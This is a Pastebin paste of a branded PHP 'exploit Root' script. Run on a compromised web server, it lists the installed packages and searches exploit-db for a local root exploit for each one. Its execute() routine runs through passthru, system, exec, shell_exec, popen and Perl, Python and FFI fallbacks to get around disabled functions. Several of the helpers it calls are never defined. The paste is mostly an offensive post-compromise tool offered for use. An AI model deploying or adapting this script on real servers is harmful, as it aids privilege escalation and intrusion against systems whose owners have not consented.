sirnon

exploit Root ~ JxH

Jul 30th, 2013
171
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <head>
  3. <meta content="text/html; charset=ISO-8859-1"
  4. http-equiv="content-type">
  5. <title>exploit Root ~ JxH</title>
  6. </head>
  7. <body>
  8. <div style="text-align: center;">JaBr<span style="color: red;">O</span>t
  9. HaCkEr<br>
  10. Om4rJxH@gmail.com<br>
  11. </div>
  12. </body>
  13. </html>
  14.  
  15. <ol>
  16. <strong>
  17. <?
  18. #c0d3r : Al7rby
  19. #Rights : JaBrOt HaCkEr ~ Om4rJxH@gmail.com
  20.  
  21.  
  22.  
  23. @set_time_limit(0);
  24. @error_reporting(E_ALL | E_NOTICE);
  25.  
  26.  
  27. echo "<pre>";
  28.  
  29. @unlink("jxh.txt");
  30. execute("yum list installed |awk {' print $1 '} |awk -F'.' {' print $1 '} > jxh.txt");
  31. $apps = @file('jxh.txt');
  32. (!$apps) ? die("Error::jxh.txt Not Exist , Means Can't execute with PHP ."):"";
  33.  
  34. echo "<p># There is : [".count($apps)."] Application</p>";
  35.  
  36.  
  37. foreach($apps as $app){
  38.  
  39. $app = str_replace(array("\n","\r"),"",$app);
  40.  
  41.  
  42. echo (exploit_db($app)) ? "[+] Found ( <b>$app</b> ) : <a href=http://www.exploit-db.com/search/?action=search&filter_description=$app>here</a>\n":"[-] Not Found ( $app )\n";
  43.  
  44. }
  45.  
  46. function exploit_db($wht){
  47.  
  48. $result = @file_get_contents("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$wht&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
  49.  
  50. flush();flush();
  51.  
  52. return (eregi("No results",$result)) ? false:true;
  53.  
  54. }
  55.  
  56. function execute($command)
  57. {
  58. global $os;
  59. if(function_exists('passthru')){$exec = passthru($command);}
  60. elseif(function_exists('system') && !$exec){$exec= system($command); }
  61. elseif(function_exists('exec') && !$exec){exec($command,$output);$exec=join("\n",$output);}
  62. elseif(function_exists('shell_exec') && !$exec){$exec=shell_exec($command);}
  63. elseif(function_exists('popen') && !$exec){$fp = popen($command,"r");
  64. {while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}$exec = convert_cyr_string($result,"d","w");}
  65. elseif(function_exists('win_shell_execute') && !$exec){$exec = winshell($command);}
  66. elseif(function_exists('win32_create_service') && !$exec){$exec=srvshell($command);}
  67. elseif(extension_loaded('ffi') && !$exec){$exec=ffishell($command);}
  68. elseif(extension_loaded('perl') && !$exec){$exec=perlshell($command);}
  69. elseif(!$exec) {$exec = slashBypass($command);}
  70. elseif(!$exec && extension_loaded('python'))
  71. {$exec = python_eval("import os
  72. pwd = os.getcwd()
  73. print pwd
  74. os.system('".$command."')");}
  75. elseif($exec){return $exec;}
  76. }
  77.  
  78.  
  79. ?>
  80. </strong>
  81. </ol>
  82. <html>
  83. <head>
  84. <title></title>
  85. </head>
  86. <body>
  87. <div style="text-align: center;">© <span style="font-weight: bold;">J<span
  88. style="color: red;">x</span>H</span> 2010<br>
  89. </div>
  90. <div style="text-align: center;"></div>
  91. </body>
  92. </html>
Add Comment
Please, Sign In to add comment